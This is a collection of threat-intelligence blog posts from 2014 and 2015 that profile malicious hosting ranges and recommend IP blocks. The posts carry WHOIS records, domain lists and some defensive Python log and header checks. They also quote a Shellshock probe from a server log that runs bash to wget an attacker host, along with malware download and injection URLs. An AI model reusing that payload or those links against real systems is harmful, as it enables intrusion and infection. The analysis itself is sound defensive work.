
Monday 21 September 2015

Tainted Network: "kfc.i.illuminationes.com/snitch" and VPS Hosting of Latvia (91.226.32.0/23)

I've been seeing some injection attacks since last week utilising hosting services of VPS Hosting in Latvia. These are continuing today, with attacks like this one [URLquery] which sends traffic to:

[donotclick]kfc.i.illuminationes.com/snitch

This is hosted on 91.226.33.54. The exploit is not clear at this point, but some sources say that this is some sort of TDS kit. The URLquery transaction flowchart shows the attack in action.


The injected script sends the keywords and referring site upstream, for example:

[donotclick]kfc.i.illuminationes.com/snitch?default_keyword=Team%20Tyra%20%7C%20The%20most%20popular%20equestrian%20website%20in%20Sweden%2FEurope&referrer=&se_referrer=&source=www.teamtyra.se

Although the attacks in the past few days only seem to have utilised 91.226.33.54, an analysis of the netblock [pastebin] shows several bad or spammy sites in 91.226.32.0/23, so my recommendation is that you banish this range from your network.

UPDATE:
ZScaler are also tracking this infection; an analysis of what it does can be found here.

Monday 7 September 2015

Something evil on 184.105.163.192/26 / White Falcon Communications / Dmitry Glazyrin

So.. I spotted some Nuclear EK (or some other Flash exploit) traffic on our network which attracted my interest. The IP in question was 184.105.163.243 hosted on what appears to be a Hurricane Electric IP. Personally, I don't tend to see a lot of bad stuff on HE so I looked more closely at the IP WHOIS and saw it was part of a range 184.105.163.192/26 suballocated to:

contact:ID;I:POC-DC-1258
contact:Auth-Area:contacts
contact:Class-Name:contact
contact:Name:Dmitry Glazyrin
contact:Company:White Falcon Communications
contact:Street-Address:3-758 Riverside Dr
contact:City:Port Coquitlam
contact:Province:BC
contact:Postal-Code:V3B 7V8
contact:Country-Code:CA
contact:Phone:+1-510-580-4100


The next step was to query the range using DNSDB to see what has been hosted there. This came back with several thousand sites that have been hosted there in the past, the following of which are still hosted in the 184.105.163.192/26 range now..


Sites that are flagged as malware by Google are highlighted and these are all hosted on 184.105.163.243. But what was interesting was what White Falcon Communications have been hosting in the past. When I ran the entirety of all the sites from DNSDB through my checker, I got some interesting results* [csv].

Out of 2867 sites analysed, 1973 (69%) sites had either hosted malware or were spammy. Some of the unrated sites are clearly phishing sites (e.g. usabanksecurity.com). Although these sites are not hosted on White Falcon Communications IPs now, they all have been at some point in the past.

So, who is this outfit? Well, it didn't take long to come up with a couple of news stories, firstly this one where White Falcon had been raided by police in Canada in connection with C2 infrastructure for the Citadel botnet. That was followed by this story where White Falcon was allegedly suing law enforcement back, due to alleged "negligence".

However, given the sheer volume of crap that White Falcon has hosted in the past and its current problem with exploit kits, I would definitely recommend blocking traffic to 184.105.163.192/26 to be on the safe side.

* fields are domain name, current IP address, MyWOT ratings, Google Safebrowsing rating, SURBL status.

Friday 24 July 2015

Evil network: Malicious RATs (including milano.exe) on 185.19.85.128/26 (Datawire AG)

There's more to this spam than meets the eye:

From:    wholesale.uganda@anisuma.com
To:    "tariq@paramountdistributors.com" [wholesale.uganda@anisuma.com]
Date:    24 July 2015 at 13:31
Subject:    re:invoice

Attention
Please confirm your consignee name and address on the BL
http://a.pomf.se/cvpkgu.rar
please let update me
thanks

"Anisuma Traders" is the name of a legitimate trading corporation with operations in several African countries, although they are not sending the spam. It looks like a phish, right? Wrong..

The apparent link to a .rar file caught my eye. In fact, the download location is not pomf.se (a defunct Swedish site) but the click chain goes like this:

http://ge.tt/api/1/files/1XjW10L2/0/blob?download
http://api.ge.tt/1/files/1XjW10L2/0/blob?download
http://ec2-54-155-123-115.eu-west-1.compute.amazonaws.com:9009/streams/1XjW10L2/stu.rar?sig=-U7AIHwQKNyk4BP6A2uOe9UYEFBYCm3SADo&type=download

The file downloaded is stu.rar which in turn contains an executable milano.exe. I'm going to take a guess and suggest that this is a Very Bad File, although the VirusTotal report gives a detection rate of just 1/55 with McAfee flagging it as "BehavesLike.Win32.BackdoorNJRat.gc".

Both the Malwr and Hybrid Analysis reports show that it hooks into the OS and attempts to avoid detection. Crucially, they both show network traffic to gee.duia.eu on 185.19.85.138 (Datawire, Switzerland).

So, McAfee thinks this is a RAT and there's suspect network traffic, but what do the email headers tell us?

Received: from mail.anisuma.com (mail.jackys.com [83.111.201.118])
    (using TLSv1 with cipher AES128-SHA (128/128 bits))
    (No client certificate requested)
    by [redacted] (Postfix) with ESMTPS id A8CE2AF548
    for [redacted]; Fri, 24 Jul 2015 12:32:29 +0000 (UTC)
Received: from [10.85.138.34] by mail.jackys.com (Cipher TLSv1:-SHA:128) (MDaemon PRO v12.5.3)
    with ESMTP id md50009556350.msg
    for [redacted]; Fri, 24 Jul 2015 16:33:59 +0400
X-Spam-Processed: mail.jackys.com, Fri, 24 Jul 2015 16:33:59 +0400
    (not processed: message from trusted or authenticated source)
X-MDRemoteIP: 185.19.85.138
X-Return-Path: prvs=164718a849=wholesale.uganda@anisuma.com
X-Envelope-From: wholesale.uganda@anisuma.com
X-MDaemon-Deliver-To: [redacted]
Content-Type: multipart/alternative; boundary="===============0415218432=="
MIME-Version: 1.0
Subject: re:invoice
To: "tariq@paramountdistributors.com" <wholesale.uganda@anisuma.com>
From: wholesale.uganda@anisuma.com
Date: Fri, 24 Jul 2015 13:31:09 +0100

The "X-MDRemoteIP" header shows that the email originates from the same server it is phoning home to. This is unusual because most spam these days comes from botnets, and if the originating server gets shut down for spam then the infected clients won't be able to phone home. The email routes through servers belonging to jackys.com in the UAE, perhaps indicating that someone has altered their systems to allow the malicious traffic to route through.
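
The header check described above can be automated. The following Python is an added example, not code from the original post: it pulls every IPv4 literal out of a trimmed copy of the quoted headers and compares each one with the C2 address from the sandbox reports and the 185.19.85.128/26 range. The function names and verdict labels are assumptions made for the example.

```python
import ipaddress
import re
from email import message_from_string

# Trimmed copy of the headers quoted in the post ([redacted] kept as published).
RAW_HEADERS = """\
Received: from mail.anisuma.com (mail.jackys.com [83.111.201.118])
    by [redacted] (Postfix) with ESMTPS id A8CE2AF548
    for [redacted]; Fri, 24 Jul 2015 12:32:29 +0000 (UTC)
Received: from [10.85.138.34] by mail.jackys.com (Cipher TLSv1:-SHA:128) (MDaemon PRO v12.5.3)
    with ESMTP id md50009556350.msg
    for [redacted]; Fri, 24 Jul 2015 16:33:59 +0400
X-MDRemoteIP: 185.19.85.138
Subject: re:invoice
From: wholesale.uganda@anisuma.com

"""

# Four dotted groups that are not part of a longer dotted number (skips "v12.5.3").
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")


def header_ips(raw_headers):
    """Return (header name, address) pairs for every valid IPv4 literal found."""
    msg = message_from_string(raw_headers)  # unfolds continuation lines for us
    pairs = []
    for name, value in msg.items():
        for candidate in IPV4_RE.findall(value):
            try:
                pairs.append((name, ipaddress.ip_address(candidate)))
            except ValueError:
                continue  # looked like an address but had an octet above 255
    return pairs


def correlate(raw_headers, c2_addresses, blocked_networks):
    """Label each header address against known C2 addresses and blocked ranges."""
    c2 = {ipaddress.ip_address(a) for a in c2_addresses}
    nets = [ipaddress.ip_network(n) for n in blocked_networks]
    findings = []
    for name, ip in header_ips(raw_headers):
        if ip.is_private:
            verdict = "internal hop"          # RFC 1918 address, not routable
        elif ip in c2:
            verdict = "matches sandbox C2"    # sender and phone-home host coincide
        elif any(ip in net for net in nets):
            verdict = "in blocked range"
        else:
            verdict = "no match"
        findings.append((name, str(ip), verdict))
    return findings


if __name__ == "__main__":
    for row in correlate(RAW_HEADERS, ["185.19.85.138"], ["185.19.85.128/26"]):
        print(*row, sep="\t")
```
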

185.19.85.138 is therefore a server of interest, but a quick look at the IP and the neighbourhood indicates that this isn't just a single popped server.. there are 58 IPs hosting what appears to be malicious data (listed at the end) taking up the entire 185.19.85.128/26 range.

I'm betting that renting a /26 slice of Swiss servers isn't cheap.

Out of all the malicious domains (listed at the end of the post), one stands out: boss.milano22.com (because the binary is named milano.exe). That is related to this malware, but the WHOIS details reveal no clues.

Another one that also caught my eye because it is multihomed on so many IPs is zexio.no-ip.biz which is related to this malware from 2012 which is variously identified as Shakblades and/or Blackshades, both illicit RAT tools.

Looking at various other domains shows that they are connected with other malicious activity over the past two years or so. What that means is that this operation is not only big, but has been going on for some time.

For research purposes, a copy of the malware is here (Zip file, password=infected)

Personally, I would recommend that you block all dynamic DNS domains on a corporate network. Combined with the other potentially malicious domains, that gives the following recommended blocklist:


Malicious IPs:

Malicious domains:

Friday 20 March 2015

Something evil on 85.143.216.102 and 94.242.205.101

I will confess that I don't have much information on what this apparent exploit kit is or how it works, but there seems to be something evil on 94.242.205.101 (root SA, Luxembourg) [VT report] being reached via 85.143.216.102 (AirISP, Russia) [VT report].

Whatever it is, it is using subdomains from hijacked GoDaddy accounts [1] [2] which is a clear sign of badness. The hijacked GoDaddy domains change very quickly, but these have all been used in the past day or so on both those IPs:


For practical purposes though I recommend you block traffic to the IPs rather than the domains.

Recommended blocklist:
85.143.216.102
94.242.205.101

UPDATE:
These following nearby IPs have also been distributing badness. I recommend you block these too:
85.143.216.103
94.242.205.98

Tuesday 17 February 2015

Something evil on 92.63.88.0/24 (MWTV, Latvia)

I've been tracking Dridex for some time, and I keep seeing IPs for MWTV in Latvia cropping up. So far I have seen:

92.63.88.87
92.63.88.97
92.63.88.100
92.63.88.105
92.63.88.106
92.63.88.108

I'm not sure how widely this spreads through the MWTV network, but I would certainly recommend blocking 92.63.88.0/24 on your network perimeter.

Friday 13 February 2015

Something evil on 95.163.121.0/24 (Digital Network JSC / com4tel.ru / cloudavt.com)

I've written about DINETHOSTING aka Digital Network JSC many times before, and frankly their entire IP range is a sea of crap, and I have a whole load of blocks in the 95.163.64.0/18 range (including the entirety of 95.163.64.0/10). This latest sea of badness seems to be suballocated to a customer using the 95.163.121.0/24 block.

inetnum:        95.163.121.0 - 95.163.121.255
netname:        RU-CLOUDAVT-NET
descr:          LLC ABT Cloud Network
country:        RU
admin-c:        PPP9992-RIPE
tech-c:         PPP9992-RIPE
status:         ASSIGNED PA
mnt-by:         DN-MNT
changed:        ncc@msm.ru 20150213
source:         RIPE

person:         Andrey Tkachenko
address:        107589, Russia Moscow street Khabarovsk 4A
e-mail:         cc-it@com4tel.ru
phone:          +7 916 626 7798
fax-no:         +7 916 626 7798
nic-hdl:        PPP9992-RIPE
abuse-mailbox:  info@cloudavt.com
mnt-by:         DN-MNT
changed:        noc@msm.ru 20140429
source:         RIPE

route:          95.163.64.0/18
descr:          Digital Network JSC
descr:          Moscow, Russia
descr:          http://www.msm.ru
descr:          aggregate prefix
origin:         AS12695
mnt-by:         DN-MNT
changed:        noc@msm.ru 20121129
source:         RIPE


Just looking at blog posts, I can see badness occurring in the recent past on the following IPs:
95.163.121.71 [1]
95.163.121.72 [2]
95.163.121.188 [3]
95.163.121.216 [4]
95.163.121.217 [5]

That's quite a high concentration of bad servers in a relatively small block. A quick look at what is currently hosted indicates (in my personal opinion) nothing of value, and I would recommend blocking the entire 95.163.121.0/24 range as a precaution.

Friday 6 February 2015

Something evil on 5.196.143.0/28 and 5.196.141.24/29 (verelox.com)

This quite interesting blog post from Cyphort got me digging into that part of the infection chain using nonsense .eu domains. It uncovered a whole series of IPs and domains that have been used to spread Cryptowall (possibly other malware too), hosted in the 5.196.143.0/28 and 5.196.141.24/29 ranges (and possibly more).

These are OVH IP ranges, suballocated to a customer called Verelox.com. I think that Verelox is a legitimate but very small web host that has suffered a major compromise of their servers.

The first range is 5.196.141.24/29 which has apparently compromised servers at:
 
5.196.141.24
5.196.141.25
5.196.141.26
5.196.141.27

..you can see a dump of probably evil domains in this pastebin. The second range is 5.196.143.0/28 with apparently compromised servers at:

5.196.143.3
5.196.143.4
5.196.143.5
5.196.143.6
5.196.143.7
5.196.143.8
5.196.143.10
5.196.143.11
5.196.143.12
5.196.143.13

..you can see a list of those domains in this pastebin

Registration details of the domains vary, including some that use the somewhat amusing email address reach4keys@gmail.com. Some of the .eu domains and the .xyz domains have contact details as follows:

Registrant ID: INTE54fjkzffmcv1
Registrant Name: Ramil Jamaletdinov
Registrant Organization:
Registrant Street: Bolshaya str, 15, kv.12
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 105553
Registrant Country: RU
Registrant Phone: +7.90988766754
Registrant Phone Ext:
Registrant Fax: +7.
Registrant Fax Ext:
Registrant Email: jramil889@gmail.com


I don't know if this person actually exists or indeed has anything to do with this, all searches come up blank.

In addition to this, some of these domains use nameservers on the following IP addresses:

168.235.70.106
168.235.69.219


These are allocated to Ramnode LLC in the US. I would suggest that they are under the control of the bad guys and are worth blocking traffic to.

Note that Cyphort identify these C&C servers for the malware:
asthalproperties.com:4444
pratikconsultancy.com:8080

The following IPs and domain names all seem to be connected and I would recommend blocking at least the IP addresses and domains in bold (the other domains look like they are probably throwaway ones):

5.196.143.0/28
5.196.141.24/29
168.235.69.219
168.235.70.106

asthalproperties.com
pratikconsultancy.com




Thursday 8 January 2015

Persistent hijacked GoDaddy domains serve malware via Turkish IPs

Last year I wrote about a small bunch of IPs belonging to Radore Veri Merkezi Hizmetleri A.S in Turkey that seemed to be aggressively pushing an exploit kit via hijacked GoDaddy domains. Today I was slightly surprised to see that this is still going on, and in some cases using the same domains as they were all those months ago.

Let's start by looking at an example hijacked domain gssportspics.com which is a neat little site with some high school photos of sports and events on.


We can look up the DNS details for www.gssportspics.com and they look OK with an IP of 184.168.152.5 which belongs to GoDaddy.

01/08/15 14:06:28 dns www.gssportspics.com
Mail for www.gssportspics.com is handled by smtp.secureserver.net mailstore1.secureserver.net
Canonical name: gssportspics.com
Aliases:
  www.gssportspics.com
Addresses:
  184.168.152.5


The domain is registered by GoDaddy, the domain is hosted by GoDaddy. Makes sense, and the website is clean of malware as far as I can tell.

But the problem is that there are a whole bunch of subdomains also using the gssportspics.com that you can't easily tell are there. For example, these subdomains all exist too:

invu.gssportspics.com
yossi.gssportspics.com
auckle.gssportspics.com
sively.gssportspics.com
truset.gssportspics.com
vishal.gssportspics.com
sovieana.gssportspics.com
wiramart.gssportspics.com
gardenhour.gssportspics.com
spechtling.gssportspics.com

Let's look up one of these..

01/08/15 14:24:45 dns vishal.gssportspics.com
Canonical name: vishal.gssportspics.com
Addresses:
  31.210.96.158


Well, that IP address ain't GoDaddy.

inetnum:        31.210.64.0 - 31.210.127.255
netname:        TR-RADORE-20110504
descr:          Radore Veri Merkezi Hizmetleri A.S.
country:        TR
org:            ORG-RHTH1-RIPE
admin-c:        RLA11-RIPE
tech-c:         RLA11-RIPE
status:         ALLOCATED PA
mnt-by:         RIPE-NCC-HM-MNT
mnt-lower:      RADORE-MNT
mnt-routes:     RADORE-MNT
mnt-domains:    RADORE-MNT
notify:         registry@rh.com.tr
changed:        hostmaster@ripe.net 20110504
changed:        hostmaster@ripe.net 20130410
changed:        bit-bucket@ripe.net 20130930
source:         RIPE


Well, we've been here before and I can tell you that these sort of hijacked sites are hosted on the following IPs:

31.210.96.155
31.210.96.156
31.210.96.157
31.210.96.158


I don't know how this Turkish host suballocates IPs to customers, but it is roughly equivalent to 31.210.96.152/29.
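
One way to spot this pattern in DNS data and to turn the offending addresses into a single block, as an added example (not code from the original post). The observation list is constructed: only the www and vishal records appear in the post, while the other name-to-address pairings and all function names are assumptions. Treating the /24 around the www host as the baseline is a simplifying heuristic.

```python
import ipaddress
from collections import defaultdict

# Constructed (name, A record) observations. Only the www and vishal records are
# quoted in the post; the remaining pairings are made up for this example.
OBSERVATIONS = [
    ("www.gssportspics.com", "184.168.152.5"),
    ("vishal.gssportspics.com", "31.210.96.158"),
    ("invu.gssportspics.com", "31.210.96.155"),
    ("yossi.gssportspics.com", "31.210.96.156"),
    ("auckle.gssportspics.com", "31.210.96.157"),
]


def registered_domain(name):
    """Naive two-label registered domain; real code should use the Public Suffix List."""
    return ".".join(name.lower().rstrip(".").split(".")[-2:])


def off_network_subdomains(observations, baseline_prefix=24):
    """Flag subdomains whose address lies outside the network of the apex/www host."""
    baseline = defaultdict(set)
    for name, addr in observations:
        name, dom = name.lower(), registered_domain(name)
        if name in (dom, "www." + dom):
            net = ipaddress.ip_network(f"{addr}/{baseline_prefix}", strict=False)
            baseline[dom].add(net)
    flagged = defaultdict(list)
    for name, addr in observations:
        name, dom = name.lower(), registered_domain(name)
        if name in (dom, "www." + dom) or dom not in baseline:
            continue  # baseline hosts themselves, or domains with no baseline
        ip = ipaddress.ip_address(addr)
        if not any(ip in net for net in baseline[dom]):
            flagged[dom].append((name, addr))
    return dict(flagged)


def covering_prefix(addresses):
    """Smallest single IPv4 CIDR block that contains every address given."""
    ints = [int(ipaddress.IPv4Address(a)) for a in addresses]
    lo, hi = min(ints), max(ints)
    host_bits = (lo ^ hi).bit_length()       # bits in which lowest and highest differ
    base = lo >> host_bits << host_bits      # clear those bits to get the network
    return ipaddress.ip_network(f"{ipaddress.IPv4Address(base)}/{32 - host_bits}")


def block_summary(addresses):
    """Return (covering block, count of unobserved addresses it also blocks)."""
    block = covering_prefix(addresses)
    return block, block.num_addresses - len(set(addresses))


if __name__ == "__main__":
    for dom, hits in off_network_subdomains(OBSERVATIONS).items():
        block, extra = block_summary([addr for _, addr in hits])
        print(f"{dom}: {len(hits)} off-network subdomains, block {block} "
              f"(also covers {extra} addresses not seen)")
```

The second number is why the /29 is only "roughly equivalent": the block covers more addresses than the four that were observed.
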

So how are these hijacks happening? Actually, I don't know, although I do know that this is very common with GoDaddy accounts that use domaincontrol.com nameservers. Perhaps the accounts are being phished, hit in an XSS attack or there is a weakness in GoDaddy's DNS architecture. GoDaddy are normally very good at cleaning this sort of thing up, so let's hope they can put a stop to this now.

What the exact payload of these IPs is I don't know because it is hardened against analysis, but they have hosted Ponmocup in the past. I have observed traffic being sent to these servers via hacked sites, and given the subdomain hijacking it is clear that something very bad is going on. You can see an example of URLquery failing to analyse one of these sites here. I suspect that the payload only works once per visiting IP.

You can see an example of some of the LIVE subdomains hosted on these IPs here [pastebin] or a full list of ALL the hijacked subdomains that I have seen over time in this range here.

Currently, the following domains all have hijacked subdomains. As far as I can tell, they are all legitimate sites and I would hesitate to block them; instead I would recommend blocking the IP address ranges listed above.




Wednesday 7 January 2015

Exploit kits on Choopa LLC / Gameservers.com IP addresses

While chasing down this exploit kit yesterday, I noticed an awful lot of related IP addresses and domains that also seemed to be hosting malware.

The characteristics of these malicious landing pages are that they use free domains (currently .co.vu) and seem to have a very short lifespan. As I write this, the following malicious domains are LIVE:


A typical exploit landing page looks like this [URLquery report] which appears to be the Nuclear EK.

These are hosted on the following Choopa LLC / Gameservers.com IP addresses (it is the same company with two different trading names) [clicking the IP leads to the VirusTotal results, ones identified as malicious are highlighted]:

108.61.165.69
108.61.165.70

108.61.165.96
108.61.167.160
108.61.172.139
108.61.175.125
108.61.177.107
108.61.177.89

All these malicious domains use the following nameservers:


Nameservers are mostly (but not all) hosted on Choopa LLC IPs:

64.187.225.245
104.224.147.220
108.61.123.219
108.61.172.145
108.61.198.148
108.61.211.121

As I said, these domains seem to have a very short life. I identified nearly 3000 domains using these nameservers, the following of which are flagged as malicious by Google (long list, sorry, scroll past it if you like):

In addition, these domains are tagged as malicious by SURBL:

These are the TLDs and SLDs being abused, operated by Freenom (cf, ga, gq, ml, tk) or CoDotVu (co.vu). It looks like perhaps Freenom cleaned up their space, but you can make your own mind up if you want to block traffic to these as a precaution:
co.vu
cf
ga
gq
ml
tk


A full list of all the domains that I can find associated with these servers can be found here [pastebin].

Recommended minimum blocklist (Choopa LLC IPs are highlighted):

UPDATE:
Choopa LLC say they have terminated those IPs. However, it may still be worth reviewing your logs for traffic to these servers as they might identify machines that have been compromised.
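
The log review suggested in the update, as an added example (not code from the original post). It assumes a hypothetical space-separated proxy log of timestamp, client IP, destination IP and hostname, uses constructed log lines, and loads only three of the IPs listed in the post. Because the domains are short-lived and the IPs were terminated, it matches on both the destination IP and the abused suffixes.

```python
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Suffixes named in the post (Freenom TLDs plus the co.vu SLD).
ABUSED_SUFFIXES = ("co.vu", "cf", "ga", "gq", "ml", "tk")

# Three of the IPs listed in the post; load the full list in practice.
# Stored as networks so that CIDR ranges can be added alongside single IPs.
BLOCKED_NETS = [ip_network(n) for n in
                ("108.61.165.69", "108.61.165.70", "108.61.172.145")]

# Constructed sample log (assumed format: timestamp client dest_ip host).
SAMPLE_PROXY_LOG = """\
2015-01-07T09:14:02Z 10.0.0.23 108.61.165.69 sample-one.co.vu
2015-01-07T09:14:05Z 10.0.0.23 192.0.2.10 www.example.com
2015-01-07T09:20:41Z 10.0.0.41 198.51.100.9 sample-two.ml:443
2015-01-07T09:31:17Z 10.0.0.57 108.61.172.145 -
2015-01-07T09:33:50Z 10.0.0.60 203.0.113.80 shop.notco.vu
truncated line
""".splitlines()


def under_suffix(host, suffixes=ABUSED_SUFFIXES):
    """Return the abused suffix the host sits under, or None.

    Matching is done on a label boundary, so shop.notco.vu is not
    treated as being under co.vu.
    """
    host = host.lower().rstrip(".")
    for suffix in suffixes:
        if host.endswith("." + suffix):
            return suffix
    return None


def review(lines):
    """Group suspicious requests by internal client address."""
    findings = defaultdict(list)
    for lineno, line in enumerate(lines, 1):
        parts = line.split()
        if len(parts) < 4:
            continue  # malformed or truncated entry
        _, client, dest, host = parts[:4]
        try:
            addr = ip_address(dest)
        except ValueError:
            continue
        reasons = []
        if any(addr in net for net in BLOCKED_NETS):
            reasons.append("ip:" + dest)
        suffix = under_suffix(host.split(":")[0])  # drop any :port
        if suffix:
            reasons.append("suffix:" + suffix)
        if reasons:
            findings[client].append((lineno, host, reasons))
    return dict(findings)


if __name__ == "__main__":
    for client, hits in sorted(review(SAMPLE_PROXY_LOG).items()):
        for lineno, host, reasons in hits:
            print(f"{client} line {lineno} {host} {', '.join(reasons)}")
```

A suffix-only hit such as the `.ml` entry is weaker evidence than an IP hit, since legitimate sites also use these free domains, so treat it as a lead for follow-up.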


Wednesday 31 December 2014

Evil network: 217.71.50.0/24 / ELTAKABEL-AS / TXTV d.o.o. Tuzla / aadeno@inet.ba

This post by Brian Krebs drew my attention to a block of Bosnian IP addresses with an unusually bad reputation. The first clue is given by Google's safe browsing diagnostics..

Safe Browsing
Diagnostic page for AS198252 (ELTAKABEL-AS)

What happened when Google visited sites hosted on this network?

    Of the 165 site(s) we tested on this network over the past 90 days, 6 site(s), including, for example, office-hosts.org/, invoice-ups.org/, refforwarding.eu/, served content that resulted in malicious software being downloaded and installed without user consent.

    The last time Google tested a site on this network was on 2014-12-31, and the last time suspicious content was found was on 2014-12-26.

Has this network hosted sites acting as intermediaries for further malware distribution?

    Over the past 90 days, we found 10 site(s) on this network, including, for example, iprecognition.eu/, invoice-ups.net/, datavail.eu/, that appeared to function as intermediaries for the infection of 525 other site(s) including, for example, webtretho.com/, detik.com/, zaodich.com/.

Has this network hosted sites that have distributed malware?

    Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 15 site(s), including, for example, iprecognition.eu/, invoice-ups.net/, datavail.eu/, that infected 572 other site(s), including, for example, webtretho.com/, detik.com/, zaodich.com/.

Some of those domains rang a bell to do with recent malware attacks. One odd thing that struck me was that this is a sparsely populated but relatively large collection of IP addresses that appear to be mostly allocated to broadband customers rather than web hosts.

An investigation into what was lurking in this AS highlighted a problem block of 217.71.50.0/24 which contains very many bad sites, the WHOIS details for that block being..

inetnum:        217.71.48.0 - 217.71.63.255
descr:          TXTV d.o.o. Tuzla
org:            ORG-TdT1-RIPE
netname:        BA-TXTV-20030807
country:        BA
admin-c:        IK879-RIPE
tech-c:         IK879-RIPE
status:         ALLOCATED PA
mnt-by:         RIPE-NCC-HM-MNT
mnt-lower:      MNT-NSC1
mnt-routes:     MNT-NSC1
notify:         ripe@txtv.ba
changed:        hostmaster@ripe.net 20030807
changed:        hostmaster@ripe.net 20040625
changed:        hostmaster@ripe.net 20050719
changed:        bitbucket@ripe.net 20081003
changed:        hostmaster@ripe.net 20110804
changed:        hostmaster@ripe.net 20140324
changed:        bit-bucket@ripe.net 20140325
source:         RIPE

organisation:   ORG-TdT1-RIPE
org-name:       TXTV d.o.o. Tuzla
org-type:       LIR
address:        TXTV d.o.o.
address:        Admir Jaganjac
address:        Focanska 1N
address:        75000
address:        Tuzla
address:        BOSNIA AND HERZEGOVINA
phone:          +38735353333
fax-no:         +38735266114
tech-c:         TXTV1-RIPE
abuse-mailbox:  abuse@txtv.ba
mnt-ref:        MNT-TXTV
mnt-ref:        RIPE-NCC-HM-MNT
mnt-by:         RIPE-NCC-HM-MNT
admin-c:        AJ2947-RIPE
admin-c:        AA26986-RIPE
admin-c:        IK879-RIPE
abuse-c:        NSC11-RIPE
source:         RIPE
e-mail:         ripe@txtv.ba
changed:        bitbucket@ripe.net 20140324

person:         Igor Krneta
address:        Majora Drage Bajalovica 18
address:        78000 Banjaluka, BA
e-mail:         ripe@elta-kabel.com
phone:          +387 51 961 001
nic-hdl:        IK879-RIPE
mnt-by:         MNT-NAVIGOSC
changed:        ikrneta@navigosc.net 20071126
source:         RIPE

route:          217.71.50.0/24
descr:          Inet subnet #1
origin:         AS31630
mnt-by:         GENELEC-MNT
changed:        aadeno@inet.ba 20061029
source:         RIPE


I highlighted the part of most interest, which appears to be a block suballocated to someone using the email address aadeno@inet.ba.

I took a look at the sites hosted in this /24 and these are the results [csv]. There are 37 malicious websites (identified by Google) out of 185 that I found in this network range. The usual level of badness tends to be around 1%, but here it is 20%. Looking at the domains, it appears that there is nothing at all of value here and you can probably count them all as malicious.

Recommended blocklist:
217.71.50.0/24

Tuesday 9 December 2014

Something evil on 5.196.33.8/29

This Tweet from @Kafeine about the Angler EK drew my attention to a small block of OVH UK addresses of 5.196.33.8/29 which appear to be completely dedicated to distributing malware.

Specifically, VirusTotal lists badness on the following IPs:

5.196.33.8
5.196.33.9
5.196.33.10

There are also some doubtful looking IP addresses on 5.196.33.15 which may well have a malicious purpose.

All of these subdomains and domains [pastebin] are hosted in this block and I would suggest that you treat them as malicious.

Recommended blocklist:
5.196.33.8/29

Incidentally, the .IN domains are not anonymised, but I would assume that the contact details are fake:
Registrant ID:WIQ_27860746
Registrant Name:Gennadiy Borisov
Registrant Organization:N/A
Registrant Street1:ul. Lyulyak 5
Registrant Street2:
Registrant Street3:
Registrant City:Varna
Registrant State/Province:
Registrant Postal Code:9000
Registrant Country:BG
Registrant Phone:+359.52601705
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:yingw90@yahoo.com


Thursday 4 December 2014

Something evil on 46.161.30.0/24 (KolosokIvan-net / Ivan Kolosok)

The IP address range of 46.161.30.0/24 (KolosokIvan-net) appears to be dedicated purely to providing phone-home servers for TorrentLocker or some other similar malware.

In the past, this IP range has hosted various sites which have moved off. At the moment it seems to host just the following domains:

worldstocktrends.net
trackmepls.ru
casinoroyal7.ru
worldnews247.ru
clubstore29.ru
yourwebsupport.ru
countryregion.ru
chooseyourhost.ru

Active IPs are as follows:

46.161.30.16
46.161.30.18
46.161.30.20
46.161.30.20
46.161.30.24
46.161.30.41
46.161.30.42
46.161.30.43

Out of those domains, these following ones are linked with some sort of file locker malware:

casinoroyal7.ru [report]
clubstore29.ru [report]
yourwebsupport.ru [report]
chooseyourhost.ru [report]

The other domains have virtually no reference to them at all, which is somewhat suspicious.

The block is allocated as follows:

inetnum:        46.161.30.0 - 46.161.30.255
netname:        KolosokIvan-net
descr:          Net for customer ID 12510
country:        RU
admin-c:        KI811-RIPE
tech-c:         KI811-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-PIN
mnt-by:         MNT-PINSUPPORT
mnt-routes:     MNT-SELECTEL
changed:        admin@pinspb.ru 20130904
source:         RIPE

person:         Kolosok Ivan
address:        ul Lenina 19-56
phone:          +380766553642
e-mail:         kolosokivan@i.ua
nic-hdl:        KI811-RIPE
mnt-by:         KolosokIvan
changed:        kolosokivan@i.ua 20130830
source:         RIPE

route:          46.161.30.0/24
descr:          Selectel Customer
origin:         AS49505
mnt-by:         MNT-SELECTEL
changed:        korsakov@selectel.ru 20140901
source:         RIPE


There are no legitimate sites in this network range, so I strongly recommend that you block the entire 46.161.30.0/24 range.

Sunday 28 September 2014

Evil network: Shellshock and MangoHost (mangohost.net) / 83.166.234.0/24

I came across this particular sewer while looking in my logs for Shellshock access attempts yesterday. I noticed that some cheeky b--stard was probing my server and attempting to WGET back to their own network to enumerate vulnerable hosts.

dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http://ad.dipad.biz/test/http://dynamoo.com/\""

ad.dipad.biz is hosted on 83.166.234.186, so pretty close to the probing IP of 83.166.234.133, which made me suspicious of the whole range, registered to:

inetnum:        83.166.234.0 - 83.166.234.255
netname:        MangoHost-Net
descr:          S.R.L. MangoHost Network
descr:          str.T.Vladimirescu 1/1, 94 Chisinau, Moldova
country:        MD
org:            ORG-SMN4-RIPE
admin-c:        VL6476-RIPE
tech-c:         VL6476-RIPE
status:         ASSIGNED PA
mnt-by:         RIM2000-MNT
notify:         noc@rim2000.ru
changed:        lukina@rim2000.ru 20140318
changed:        lukina@rim2000.ru 20140325
source:         RIPE

organisation:   ORG-SMN4-RIPE
org-name:       S.R.L. MangoHost Network
org-type:       OTHER
address:        str.T.Vladimirescu 1/1, 94 Chisinau, Moldova
e-mail:         mangohostnetwork@gmail.com
abuse-c:        AR18923-RIPE
abuse-mailbox:  mangohostnetwork@gmail.com
mnt-ref:        CLOUDATAMD-MNT
mnt-by:         CLOUDATAMD-MNT
mnt-ref:        RIM2000-MNT
changed:        iuraqq@gmail.com 20140314
source:         RIPE

person:         Victor Letkovski
address:        T. Vladimirescu str 1/1 2024 Chisinau
phone:          +373 79 342393
nic-hdl:        VL6476-RIPE
mnt-by:         BSB-SERVICE-MNT
changed:        ripe@plusserver.de 20130520
source:         RIPE

% Information related to '83.166.234.0/24AS200019'

